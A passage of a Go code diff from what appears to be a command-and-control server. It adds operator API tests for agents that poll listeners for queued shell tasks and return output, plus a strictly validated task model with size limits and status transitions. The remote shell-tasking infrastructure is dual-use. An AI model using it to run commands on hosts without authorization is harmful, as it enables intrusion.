+		firstPage[49]["command"] != "command-049" {
+		t.Fatalf("unexpected default legacy result page: %#v", firstPage)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/results?limit=100&offset=100",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("final legacy result page: %d: %s", rec.Code, rec.Body.String())
+	}
+	assertLegacyResultPageHeaders(t, rec, 100, 100, 105, 5, "")
+	var finalPage []map[string]interface{}
+	if err := json.Unmarshal(rec.Body.Bytes(), &finalPage); err != nil {
+		t.Fatalf("decode final legacy result page: %v", err)
+	}
+	if len(finalPage) != 5 ||
+		finalPage[0]["command"] != "command-100" ||
+		finalPage[4]["command"] != "command-104" {
+		t.Fatalf("unexpected final legacy result page: %#v", finalPage)
+	}
+
+	invalidQueries := []string{
+		"?limit=0",
+		"?limit=101",
+		"?limit=-1",
+		"?limit=one",
+		"?limit=",
+		"?offset=-1",
+		"?offset=one",
+		"?offset=",
+		"?offset=999999999999999999999999999999999999",
+		"?limit=1&limit=2",
+		"?offset=1&offset=2",
+		"?unknown=1",
+		"?limit=1;offset=2",
+	}
+	for _, query := range invalidQueries {
+		t.Run(query, func(t *testing.T) {
+			rec := httptest.NewRecorder()
+			req := httptest.NewRequest(
+				http.MethodGet,
+				"/api/agents/agent-one/results"+query,
+				nil,
+			)
+			handler.HandleRequest(rec, req)
+			if rec.Code != http.StatusBadRequest {
+				t.Fatalf("query %q: expected 400, got %d: %s", query, rec.Code, rec.Body.String())
+			}
+		})
+	}
+}
+
+func TestOperatorAPILegacyResultsEmptyPageIsJSONArray(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agents/agent-one/results", nil)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("empty legacy result page: %d: %s", rec.Code, rec.Body.String())
+	}
+	assertLegacyResultPageHeaders(t, rec, 50, 0, 0, 0, "")
+	if strings.TrimSpace(rec.Body.String()) != "[]" {
+		t.Fatalf("empty legacy result page must be a JSON array, got %q", rec.Body.String())
+	}
+}
+
+func TestOperatorAPILegacyResultsBodyBudgetKeepsLosslessCursor(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+	listenersInManager := handler.serverManager.GetListenerManager().ListListeners()
+	if len(listenersInManager) != 1 {
+		t.Fatalf("initial listener count = %d, want 1", len(listenersInManager))
+	}
+
+	const totalResults = 20
+	largeOutput := strings.Repeat("x", 1<<20)
+	history := make([]map[string]interface{}, 0, totalResults)
+	for i := 0; i < totalResults; i++ {
+		history = append(history, map[string]interface{}{
+			"command":   fmt.Sprintf("large-%02d", i),
+			"output":    largeOutput,
+			"timestamp": "2026-07-23T16:30:00Z",
+		})
+	}
+	listenersInManager[0].Protocol = &staticTaskProtocol{
+		agentID:  "agent-one",
+		lastSeen: time.Now().UTC(),
+		tasks:    map[string]tasks.Task{},
+		results:  history,
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/results?limit=20",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("budgeted legacy result page: %d: %s", rec.Code, rec.Body.String())
+	}
+	if rec.Body.Len() > 16<<20 {
+		t.Fatalf("legacy result page is %d bytes, exceeds 16 MiB budget", rec.Body.Len())
+	}
+	var firstPage []map[string]interface{}
+	if err := json.Unmarshal(rec.Body.Bytes(), &firstPage); err != nil {
+		t.Fatalf("decode budgeted legacy result page: %v", err)
+	}
+	if len(firstPage) == 0 || len(firstPage) >= totalResults {
+		t.Fatalf("body budget returned %d records, want between 1 and %d", len(firstPage), totalResults-1)
+	}
+	nextOffset := strconv.Itoa(len(firstPage))
+	assertLegacyResultPageHeaders(t, rec, 20, 0, totalResults, len(firstPage), nextOffset)
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/results?limit=20&offset="+nextOffset,
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("budgeted legacy result continuation: %d: %s", rec.Code, rec.Body.String())
+	}
+	if rec.Body.Len() > 16<<20 {
+		t.Fatalf("legacy result continuation is %d bytes, exceeds 16 MiB budget", rec.Body.Len())
+	}
+	var secondPage []map[string]interface{}
+	if err := json.Unmarshal(rec.Body.Bytes(), &secondPage); err != nil {
+		t.Fatalf("decode budgeted legacy result continuation: %v", err)
+	}
+	assertLegacyResultPageHeaders(
+		t,
+		rec,
+		20,
+		len(firstPage),
+		totalResults,
+		len(secondPage),
+		"",
+	)
+
+	combined := append(append([]map[string]interface{}{}, firstPage...), secondPage...)
+	if len(combined) != totalResults {
+		t.Fatalf("budgeted pages returned %d records, want %d", len(combined), totalResults)
+	}
+	for i, result := range combined {
+		want := fmt.Sprintf("large-%02d", i)
+		if result["command"] != want {
+			t.Fatalf("budgeted pages lost or duplicated cursor at %d: got %#v, want %q", i, result, want)
+		}
+	}
+}
+
+func TestOperatorAPIRejectsOversizedTaskCreateBody(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(
+		http.MethodPost,
+		"/api/agents/agent-one/tasks",
+		bytes.NewBufferString(
+			`{"schema_version":1,"type":"shell","arguments":{"command":"`+
+				strings.Repeat("x", int(tasks.MaxTaskCreateBodyBytes)+1)+
+				`"},"timeout_seconds":30,"expires_in_seconds":300}`,
+		),
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusRequestEntityTooLarge {
+		t.Fatalf("expected oversized task request 413, got %d: %s", rec.Code, rec.Body.String())
 	}
 }
 
@@ -142,7 +993,7 @@ func TestOperatorAPIRejectsInvalidCommandRequests(t *testing.T) {
 			method:     http.MethodPost,
 			path:       "/api/agents/missing/command",
 			body:       map[string]string{"command": "whoami"},
-			wantStatus: http.StatusInternalServerError,
+			wantStatus: http.StatusNotFound,
 		},
 	}
 
@@ -204,11 +1055,125 @@ func newTestAPIHandler(t *testing.T, agentID string) (*APIHandler, *behaviour.HT
 	if err := proto.HandleAgentHeartbeat(heartbeat); err != nil {
 		t.Fatalf("register agent heartbeat: %v", err)
 	}
+	listener.Status = listeners.StatusActive
 	if err := manager.GetListenerManager().AddListener(listener); err != nil {
 		t.Fatalf("add listener: %v", err)
 	}
 
 	return NewAPIHandler(manager), proto
+}
+
+func addTestHTTPListener(
+	t *testing.T,
+	handler *APIHandler,
+	listenerID string,
+	port int,
+	status listeners.ListenerStatus,
+	agentID string,
+) *behaviour.HTTPPollingProtocol {
+	t.Helper()
+	listener, err := listeners.NewListener(listeners.ListenerConfig{
+		ID:       listenerID,
+		Name:     listenerID,
+		Protocol: "http",
+		BindHost: "127.0.0.1",
+		Port:     port,
+	})
+	if err != nil {
+		t.Fatalf("create listener %s: %v", listenerID, err)
+	}
+	proto, ok := listener.Protocol.(*behaviour.HTTPPollingProtocol)
+	if !ok {
+		t.Fatalf("listener %s protocol = %T, want HTTP polling", listenerID, listener.Protocol)
+	}
+	heartbeat := []byte(
+		`{"id":"` + agentID +
+			`","os":"linux","hostname":"` + listenerID +
+			`","ip":"127.0.0.1"}`,
+	)
+	if err := proto.HandleAgentHeartbeat(heartbeat); err != nil {
+		t.Fatalf("register %s heartbeat on %s: %v", agentID, listenerID, err)
+	}
+	listener.Status = status
+	if err := handler.serverManager.GetListenerManager().AddListener(listener); err != nil {
+		t.Fatalf("add listener %s: %v", listenerID, err)
+	}
+	return proto
+}
+
+func validTaskRequestBody(command string) map[string]interface{} {
+	return map[string]interface{}{
+		"schema_version":     tasks.SchemaVersion,
+		"type":               tasks.TypeShell,
+		"arguments":          map[string]string{"command": command},
+		"timeout_seconds":    30,
+		"expires_in_seconds": 300,
+	}
+}
+
+func assertLegacyResultPageHeaders(
+	t *testing.T,
+	rec *httptest.ResponseRecorder,
+	limit int,
+	offset int,
+	total int,
+	count int,
+	nextOffset string,
+) {
+	t.Helper()
+	want := map[string]string{
+		"Deprecation":     "true",
+		"X-Result-Limit":  strconv.Itoa(limit),
+		"X-Result-Offset": strconv.Itoa(offset),
+		"X-Result-Total":  strconv.Itoa(total),
+		"X-Result-Count":  strconv.Itoa(count),
+		"X-Next-Offset":   nextOffset,
+		"Link":            `</api/agents/agent-one/tasks>; rel="successor-version"`,
+	}
+	for name, expected := range want {
+		if actual := rec.Header().Get(name); actual != expected {
+			t.Fatalf("%s header = %q, want %q", name, actual, expected)
+		}
+	}
+}
+
+func getTaskList(t *testing.T, handler *APIHandler, path string) taskListEnvelope {
+	t.Helper()
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, path, nil)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("get task list %q: %d: %s", path, rec.Code, rec.Body.String())
+	}
+	var fields map[string]json.RawMessage
+	if err := json.Unmarshal(rec.Body.Bytes(), &fields); err != nil {
+		t.Fatalf("decode task list envelope fields: %v", err)
+	}
+	if _, ok := fields["next_offset"]; !ok {
+		t.Fatalf("task list omitted next_offset: %s", rec.Body.String())
+	}
+	var page taskListEnvelope
+	if err := json.Unmarshal(rec.Body.Bytes(), &page); err != nil {
+		t.Fatalf("decode task list envelope: %v", err)
+	}
+	return page
+}
+
+func assertTaskSummariesNewestFirst(t *testing.T, summaries []tasks.TaskSummary) {
+	t.Helper()
+	for i := 1; i < len(summaries); i++ {
+		previous := summaries[i-1]
+		current := summaries[i]
+		if current.CreatedAt.After(previous.CreatedAt) ||
+			(current.CreatedAt.Equal(previous.CreatedAt) && current.ID > previous.ID) {
+			t.Fatalf(
+				"task summaries are not newest-first at %d: previous=%#v current=%#v",
+				i,
+				previous,
+				current,
+			)
+		}
+	}
 }
 
 func jsonRequest(t *testing.T, method, path string, body interface{}) *http.Request {
@@ -242,6 +1207,99 @@ func assertNextAgentCommand(t *testing.T, proto *behaviour.HTTPPollingProtocol, 
 	}
 }
 
+func assertNextTypedTask(t *testing.T, proto *behaviour.HTTPPollingProtocol, agentID, taskID string) {
+	t.Helper()
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/tasks", nil)
+	proto.GetHTTPHandler().ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected next task 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var task tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &task); err != nil {
+		t.Fatalf("decode task response: %v", err)
+	}
+	if task.ID != taskID || task.Status != tasks.StatusDispatched {
+		t.Fatalf("unexpected dispatched task: %#v", task)
+	}
+}
+
+func completeTypedTask(
+	t *testing.T,
+	proto *behaviour.HTTPPollingProtocol,
+	task tasks.Task,
+	stdout string,
+	stderr string,
+) {
+	t.Helper()
+	handler := proto.GetHTTPHandler()
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/"+task.AgentID+"/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("dispatch typed task: %d: %s", rec.Code, rec.Body.String())
+	}
+	var dispatched tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &dispatched); err != nil {
+		t.Fatalf("decode dispatched task: %v", err)
+	}
+	if dispatched.ID != task.ID || dispatched.DispatchedAt == nil {
+		t.Fatalf("dispatched task = %#v, want %q", dispatched, task.ID)
+	}
+
+	startedAt := dispatched.DispatchedAt.Add(time.Second)
+	statusBody, err := json.Marshal(tasks.StatusUpdate{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       task.AgentID,
+		Status:        tasks.StatusRunning,
+		Timestamp:     startedAt,
+	})
+	if err != nil {
+		t.Fatalf("marshal running update: %v", err)
+	}
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/"+task.AgentID+"/tasks/"+task.ID+"/status",
+		bytes.NewReader(statusBody),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("mark typed task running: %d: %s", rec.Code, rec.Body.String())
+	}
+
+	exitCode := 0
+	resultBody, err := json.Marshal(tasks.Result{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       task.AgentID,
+		Outcome:       tasks.OutcomeCompleted,
+		StartedAt:     startedAt,
+		CompletedAt:   startedAt.Add(time.Second),
+		ExitCode:      &exitCode,
+		Output: tasks.Output{
+			Stdout: stdout,
+			Stderr: stderr,
+		},
+	})
+	if err != nil {
+		t.Fatalf("marshal typed result: %v", err)
+	}
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/"+task.AgentID+"/results",
+		bytes.NewReader(resultBody),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("complete typed task: %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
 func postAgentResult(t *testing.T, proto *behaviour.HTTPPollingProtocol, agentID, command, output string) {
 	t.Helper()
 
@@ -259,6 +1317,109 @@ func postAgentResult(t *testing.T, proto *behaviour.HTTPPollingProtocol, agentID
 	if rec.Code != http.StatusOK {
 		t.Fatalf("post agent result: expected 200, got %d: %s", rec.Code, rec.Body.String())
 	}
+}
+
+type staticTaskProtocol struct {
+	agentID  string
+	lastSeen time.Time
+	tasks    map[string]tasks.Task
+	results  []map[string]interface{}
+}
+
+var _ common.Protocol = (*staticTaskProtocol)(nil)
+var _ taskProtocol = (*staticTaskProtocol)(nil)
+
+func (p *staticTaskProtocol) Initialize() error {
+	return nil
+}
+
+func (p *staticTaskProtocol) HandleCommand(string) error {
+	return nil
+}
+
+func (p *staticTaskProtocol) HandleFileUpload(string, io.Reader) error {
+	return nil
+}
+
+func (p *staticTaskProtocol) HandleFileDownload(string) (io.Reader, error) {
+	return nil, errors.New("not implemented")
+}
+
+func (p *staticTaskProtocol) HandleAgentHeartbeat([]byte) error {
+	return nil
+}
+
+func (p *staticTaskProtocol) GetRoutes() map[string]http.HandlerFunc {
+	return nil
+}
+
+func (p *staticTaskProtocol) GetHTTPHandler() http.Handler {
+	return nil
+}
+
+func (p *staticTaskProtocol) CreateTask(string, tasks.CreateRequest) (tasks.Task, error) {
+	return tasks.Task{}, errors.New("not implemented")
+}
+
+func (p *staticTaskProtocol) ListTasks(agentID string) ([]tasks.Task, error) {
+	history := make([]tasks.Task, 0, len(p.tasks))
+	for _, task := range p.tasks {
+		if task.AgentID == agentID {
+			history = append(history, task)
+		}
+	}
+	return history, nil
+}
+
+func (p *staticTaskProtocol) CancelTask(agentID, taskID string) (tasks.Task, error) {
+	return p.GetTask(agentID, taskID)
+}
+
+func (p *staticTaskProtocol) GetTask(agentID, taskID string) (tasks.Task, error) {
+	task, ok := p.tasks[taskID]
+	if !ok || task.AgentID != agentID {
+		return tasks.Task{}, tasks.ErrNotFound
+	}
+	return task, nil
+}
+
+func (p *staticTaskProtocol) GetResults(agentID string) []map[string]interface{} {
+	page, _ := p.GetResultsPage(agentID, 0, len(p.results))
+	return page
+}
+
+func (p *staticTaskProtocol) GetResultsPage(
+	agentID string,
+	offset int,
+	limit int,
+) ([]map[string]interface{}, int) {
+	if agentID != p.agentID {
+		return []map[string]interface{}{}, 0
+	}
+	total := len(p.results)
+	start := offset
+	if start < 0 {
+		start = 0
+	}
+	if start > total {
+		start = total
+	}
+	if limit < 0 {
+		limit = 0
+	}
+	if limit > total-start {
+		limit = total - start
+	}
+	end := start + limit
+	return append([]map[string]interface{}{}, p.results[start:end]...), total
+}
+
+func (p *staticTaskProtocol) QueueLegacyShellTask(string, string) (tasks.Task, error) {
+	return tasks.Task{}, errors.New("not implemented")
+}
+
+func (p *staticTaskProtocol) AgentLastSeen(agentID string) (time.Time, bool) {
+	return p.lastSeen, agentID == p.agentID
 }
 
 func xorHex(data, key string) string {

--- a/server/internal/tasks/model.go
+++ b/server/internal/tasks/model.go
@@ -1,0 +1,432 @@
+package tasks
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"strings"
+	"time"
+	"unicode/utf8"
+)
+
+const (
+	// SchemaVersion is the only task contract version currently supported.
+	SchemaVersion = 1
+
+	DefaultTimeoutSeconds = 30
+	MaxTimeoutSeconds     = 3600
+	DefaultExpiresIn      = 300
+	MaxExpiresIn          = 604800
+
+	// The task API is intentionally bounded because agent-facing listeners must
+	// treat both task output and compromised agents as untrusted input.
+	MaxCommandCharacters      = 8 << 10
+	MaxResultStreamCharacters = 1 << 20
+	MaxResultErrorCharacters  = 8 << 10
+	MinResultExitCode         = -1 << 31
+	MaxResultExitCode         = 1<<31 - 1
+	MaxTaskHistoryPerAgent    = 1024
+	MaxTaskCreateBodyBytes    = 64 << 10
+	MaxStatusUpdateBodyBytes  = 8 << 10
+	// A schema-valid result may contain two 1 MiB character streams. A compact
+	// JSON client may encode each astral code point as a 12-byte surrogate
+	// pair, so the wire limit must cover that representation plus the bounded
+	// result envelope without stranding an agent's outbox.
+	MaxTaskResultBodyBytes   = 32 << 20
+	MaxLegacyResultBodyBytes = 10 << 20
+)
+
+type Type string
+
+const (
+	TypeShell Type = "shell"
+)
+
+type Status string
+
+const (
+	StatusQueued     Status = "queued"
+	StatusDispatched Status = "dispatched"
+	StatusRunning    Status = "running"
+	StatusCompleted  Status = "completed"
+	StatusFailed     Status = "failed"
+	StatusCancelled  Status = "cancelled"
+	StatusExpired    Status = "expired"
+)
+
+type Outcome string
+
+const (
+	OutcomeCompleted Outcome = "completed"
+	OutcomeFailed    Outcome = "failed"
+)
+
+var (
+	ErrNotFound          = errors.New("task not found")
+	ErrInvalidTransition = errors.New("invalid task status transition")
+	ErrCapacity          = errors.New("task history capacity reached")
+)
+
+// ValidationError identifies a malformed task-contract value.
+type ValidationError struct {
+	Field   string
+	Message string
+}
+
+func (e *ValidationError) Error() string {
+	if e.Field == "" {
+		return e.Message
+	}
+	return fmt.Sprintf("%s: %s", e.Field, e.Message)
+}
+
+type ShellArguments struct {
+	Command string `json:"command"`
+}
+
+type Output struct {
+	Stdout string `json:"stdout"`
+	Stderr string `json:"stderr"`
+}
+
+type Result struct {
+	SchemaVersion int       `json:"schema_version"`
+	TaskID        string    `json:"task_id"`
+	AgentID       string    `json:"agent_id"`
+	Outcome       Outcome   `json:"outcome"`
+	StartedAt     time.Time `json:"started_at"`
+	CompletedAt   time.Time `json:"completed_at"`
+	ExitCode      *int      `json:"exit_code,omitempty"`
+	Output        Output    `json:"output"`
+	Error         string    `json:"error,omitempty"`
+	errorPresent  bool
+}
+
+func (r *Result) UnmarshalJSON(data []byte) error {
+	var wire struct {
+		SchemaVersion int             `json:"schema_version"`
+		TaskID        string          `json:"task_id"`
+		AgentID       string          `json:"agent_id"`
+		Outcome       Outcome         `json:"outcome"`
+		StartedAt     time.Time       `json:"started_at"`
+		CompletedAt   time.Time       `json:"completed_at"`
+		ExitCode      *int            `json:"exit_code"`
+		Output        *rawOutput      `json:"output"`
+		Error         json.RawMessage `json:"error"`
+	}
+	if err := decodeStrictBytes(data, &wire); err != nil {
+		return err
+	}
+	if wire.Output == nil {
+		return &ValidationError{Field: "output", Message: "is required"}
+	}
+	if wire.Output.Stdout == nil {
+		return &ValidationError{Field: "output.stdout", Message: "is required"}
+	}
+	if wire.Output.Stderr == nil {
+		return &ValidationError{Field: "output.stderr", Message: "is required"}
+	}
+	var resultError string
+	errorPresent := wire.Error != nil
+	if errorPresent {
+		if string(wire.Error) == "null" {
+			return &ValidationError{Field: "error", Message: "must be a string"}
+		}
+		if err := json.Unmarshal(wire.Error, &resultError); err != nil {
+			return &ValidationError{Field: "error", Message: "must be a string"}
+		}
+	}
+	*r = Result{
+		SchemaVersion: wire.SchemaVersion,
+		TaskID:        wire.TaskID,
+		AgentID:       wire.AgentID,
+		Outcome:       wire.Outcome,
+		StartedAt:     wire.StartedAt,
+		CompletedAt:   wire.CompletedAt,
+		ExitCode:      wire.ExitCode,
+		Output: Output{
+			Stdout: *wire.Output.Stdout,
+			Stderr: *wire.Output.Stderr,
+		},
+		Error:        resultError,
+		errorPresent: errorPresent,
+	}
+	return nil
+}
+
+type rawOutput struct {
+	Stdout *string `json:"stdout"`
+	Stderr *string `json:"stderr"`
+}
+
+type Task struct {
+	SchemaVersion  int            `json:"schema_version"`
+	ID             string         `json:"id"`
+	AgentID        string         `json:"agent_id"`
+	Type           Type           `json:"type"`
+	Arguments      ShellArguments `json:"arguments"`
+	TimeoutSeconds int            `json:"timeout_seconds"`
+	Status         Status         `json:"status"`
+	CreatedAt      time.Time      `json:"created_at"`
+	QueuedAt       time.Time      `json:"queued_at"`
+	DispatchedAt   *time.Time     `json:"dispatched_at,omitempty"`
+	StartedAt      *time.Time     `json:"started_at,omitempty"`
+	CompletedAt    *time.Time     `json:"completed_at,omitempty"`
+	ExpiresAt      *time.Time     `json:"expires_at,omitempty"`
+	Result         *Result        `json:"result,omitempty"`
+}
+
+// ResultSummary is the bounded operator-list representation of a task result.
+// The potentially large stdout and stderr streams are intentionally available
+// only from the task-detail endpoint.
+type ResultSummary struct {
+	SchemaVersion int       `json:"schema_version"`
+	TaskID        string    `json:"task_id"`
+	AgentID       string    `json:"agent_id"`
+	Outcome       Outcome   `json:"outcome"`
+	StartedAt     time.Time `json:"started_at"`
+	CompletedAt   time.Time `json:"completed_at"`
+	ExitCode      *int      `json:"exit_code,omitempty"`
+	Error         string    `json:"error,omitempty"`
+}
+
+// TaskSummary retains task metadata and lifecycle timestamps while omitting
+// result streams from collection responses.
+type TaskSummary struct {
+	SchemaVersion  int            `json:"schema_version"`
+	ID             string         `json:"id"`
+	AgentID        string         `json:"agent_id"`
+	Type           Type           `json:"type"`
+	Arguments      ShellArguments `json:"arguments"`
+	TimeoutSeconds int            `json:"timeout_seconds"`
+	Status         Status         `json:"status"`
+	CreatedAt      time.Time      `json:"created_at"`
+	QueuedAt       time.Time      `json:"queued_at"`
+	DispatchedAt   *time.Time     `json:"dispatched_at,omitempty"`
+	StartedAt      *time.Time     `json:"started_at,omitempty"`
+	CompletedAt    *time.Time     `json:"completed_at,omitempty"`
+	ExpiresAt      *time.Time     `json:"expires_at,omitempty"`
+	Result         *ResultSummary `json:"result,omitempty"`
+}
+
+// Summarize returns a detached collection-safe representation of task.
+func Summarize(task Task) TaskSummary {
+	summary := TaskSummary{
+		SchemaVersion:  task.SchemaVersion,
+		ID:             task.ID,
+		AgentID:        task.AgentID,
+		Type:           task.Type,
+		Arguments:      task.Arguments,
+		TimeoutSeconds: task.TimeoutSeconds,
+		Status:         task.Status,
+		CreatedAt:      task.CreatedAt,
+		QueuedAt:       task.QueuedAt,
+		DispatchedAt:   cloneTime(task.DispatchedAt),
+		StartedAt:      cloneTime(task.StartedAt),
+		CompletedAt:    cloneTime(task.CompletedAt),
+		ExpiresAt:      cloneTime(task.ExpiresAt),
+	}
+	if task.Result != nil {
+		summary.Result = &ResultSummary{
+			SchemaVersion: task.Result.SchemaVersion,
+			TaskID:        task.Result.TaskID,
+			AgentID:       task.Result.AgentID,
+			Outcome:       task.Result.Outcome,
+			StartedAt:     task.Result.StartedAt,
+			CompletedAt:   task.Result.CompletedAt,
+			ExitCode:      cloneInt(task.Result.ExitCode),
+			Error:         task.Result.Error,
+		}
+	}
+	return summary
+}
+
+// CreateRequest is the operator-facing subset of Task. Identity, state, and
+// timestamps are assigned by the server.
+type CreateRequest struct {
+	SchemaVersion    int            `json:"schema_version,omitempty"`
+	Type             Type           `json:"type"`
+	Arguments        ShellArguments `json:"arguments"`
+	TimeoutSeconds   int            `json:"timeout_seconds"`
+	ExpiresInSeconds *int           `json:"expires_in_seconds,omitempty"`
+}
+
+type StatusUpdate struct {
+	SchemaVersion int       `json:"schema_version"`
+	TaskID        string    `json:"task_id"`
+	AgentID       string    `json:"agent_id"`
+	Status        Status    `json:"status"`
+	Timestamp     time.Time `json:"timestamp"`
+}
+
+func ValidateIdentifier(field, value string) error {
+	if value == "" {
+		return &ValidationError{Field: field, Message: "is required"}
+	}
+	if value != strings.TrimSpace(value) {
+		return &ValidationError{Field: field, Message: "must not contain surrounding whitespace"}
+	}
+	if len(value) > 128 {
+		return &ValidationError{Field: field, Message: "must be at most 128 bytes"}
+	}
+	for _, r := range value {
+		if r >= 'a' && r <= 'z' ||
+			r >= 'A' && r <= 'Z' ||
+			r >= '0' && r <= '9' ||
+			r == '-' || r == '_' || r == '.' || r == ':' {
+			continue
+		}
+		return &ValidationError{Field: field, Message: "contains unsupported characters"}
+	}
+	return nil
+}
+
+func (r CreateRequest) validate() error {
+	if r.SchemaVersion != SchemaVersion {
+		return &ValidationError{Field: "schema_version", Message: "must be 1"}
+	}
+	if r.Type != TypeShell {
+		return &ValidationError{Field: "type", Message: `must be "shell"`}
+	}
+	if strings.TrimSpace(r.Arguments.Command) == "" {
+		return &ValidationError{Field: "arguments.command", Message: "is required"}
+	}
+	if utf8.RuneCountInString(r.Arguments.Command) > MaxCommandCharacters {
+		return &ValidationError{
+			Field:   "arguments.command",
+			Message: fmt.Sprintf("must be at most %d characters", MaxCommandCharacters),
+		}
+	}
+	if r.TimeoutSeconds < 1 || r.TimeoutSeconds > MaxTimeoutSeconds {
+		return &ValidationError{Field: "timeout_seconds", Message: "must be between 1 and 3600"}
+	}
+	if r.ExpiresInSeconds == nil {
+		return &ValidationError{Field: "expires_in_seconds", Message: "is required"}
+	}
+	if *r.ExpiresInSeconds < 1 || *r.ExpiresInSeconds > MaxExpiresIn {
+		return &ValidationError{Field: "expires_in_seconds", Message: "must be between 1 and 604800"}
+	}
+	return nil
+}
+
+func (u StatusUpdate) validate(agentID, taskID string) error {
+	if u.SchemaVersion != SchemaVersion {
+		return &ValidationError{Field: "schema_version", Message: "must be 1"}
+	}
+	if err := ValidateIdentifier("task_id", u.TaskID); err != nil {
+		return err
+	}
+	if err := ValidateIdentifier("agent_id", u.AgentID); err != nil {
+		return err
+	}
+	if u.TaskID != taskID {
+		return &ValidationError{Field: "task_id", Message: "does not match request path"}
+	}
+	if u.AgentID != agentID {
+		return &ValidationError{Field: "agent_id", Message: "does not match request path"}
+	}
+	if u.Status != StatusRunning {
+		return &ValidationError{Field: "status", Message: `must be "running"`}
+	}
+	if u.Timestamp.IsZero() {
+		return &ValidationError{Field: "timestamp", Message: "is required"}
+	}
+	return nil
+}
+
+func (r Result) validate(agentID string) error {
+	if r.SchemaVersion != SchemaVersion {
+		return &ValidationError{Field: "schema_version", Message: "must be 1"}
+	}
+	if err := ValidateIdentifier("task_id", r.TaskID); err != nil {
+		return err
+	}
+	if err := ValidateIdentifier("agent_id", r.AgentID); err != nil {
+		return err
+	}
+	if r.AgentID != agentID {
+		return &ValidationError{Field: "agent_id", Message: "does not match request path"}
+	}
+	if r.Outcome != OutcomeCompleted && r.Outcome != OutcomeFailed {
+		return &ValidationError{Field: "outcome", Message: `must be "completed" or "failed"`}
+	}
+	if r.StartedAt.IsZero() {
+		return &ValidationError{Field: "started_at", Message: "is required"}
+	}
+	if r.CompletedAt.IsZero() {
+		return &ValidationError{Field: "completed_at", Message: "is required"}
+	}
+	if r.CompletedAt.Before(r.StartedAt) {
+		return &ValidationError{Field: "completed_at", Message: "must not precede started_at"}
+	}
+	if utf8.RuneCountInString(r.Output.Stdout) > MaxResultStreamCharacters {
+		return &ValidationError{
+			Field:   "output.stdout",
+			Message: fmt.Sprintf("must be at most %d characters", MaxResultStreamCharacters),
+		}
+	}
+	if utf8.RuneCountInString(r.Output.Stderr) > MaxResultStreamCharacters {
+		return &ValidationError{
+			Field:   "output.stderr",
+			Message: fmt.Sprintf("must be at most %d characters", MaxResultStreamCharacters),
+		}
+	}
+	if utf8.RuneCountInString(r.Error) > MaxResultErrorCharacters {
+		return &ValidationError{
+			Field:   "error",
+			Message: fmt.Sprintf("must be at most %d characters", MaxResultErrorCharacters),
+		}
+	}
+	if r.ExitCode != nil &&
+		(*r.ExitCode < MinResultExitCode || *r.ExitCode > MaxResultExitCode) {
+		return &ValidationError{
+			Field:   "exit_code",
+			Message: fmt.Sprintf("must be between %d and %d", MinResultExitCode, MaxResultExitCode),
+		}
+	}
+	switch r.Outcome {
+	case OutcomeCompleted:
+		if r.ExitCode == nil || *r.ExitCode != 0 {
+			return &ValidationError{Field: "exit_code", Message: "must be 0 for a completed shell task"}
+		}
+		if r.errorPresent || r.Error != "" {
+			return &ValidationError{Field: "error", Message: "must be omitted for a completed shell task"}
+		}
+	case OutcomeFailed:
+		if strings.TrimSpace(r.Error) == "" {
+			return &ValidationError{Field: "error", Message: "is required for a failed shell task"}
+		}
+	}
+	return nil
+}
+
+func canTransition(from, to Status) bool {
+	switch from {
+	case StatusQueued:
+		return to == StatusDispatched || to == StatusCancelled || to == StatusExpired
+	case StatusDispatched:
+		return to == StatusRunning || to == StatusExpired
+	case StatusRunning:
+		return to == StatusCompleted || to == StatusFailed
+	default:
+		return false
+	}
+}
+
+func decodeStrictBytes(data []byte, destination interface{}) error {
+	decoder := json.NewDecoder(bytes.NewReader(data))
+	decoder.DisallowUnknownFields()
+	if err := decoder.Decode(destination); err != nil {
+		return err
+	}
+	var trailing interface{}
+	if err := decoder.Decode(&trailing); !errors.Is(err, io.EOF) {
+		if err == nil {
+			return errors.New("must contain exactly one JSON value")
+		}
+		return err
+	}
+	return nil
+}

--- a/server/internal/tasks/model_test.go
+++ b/server/internal/tasks/model_test.go
@@ -1,0 +1,260 @@
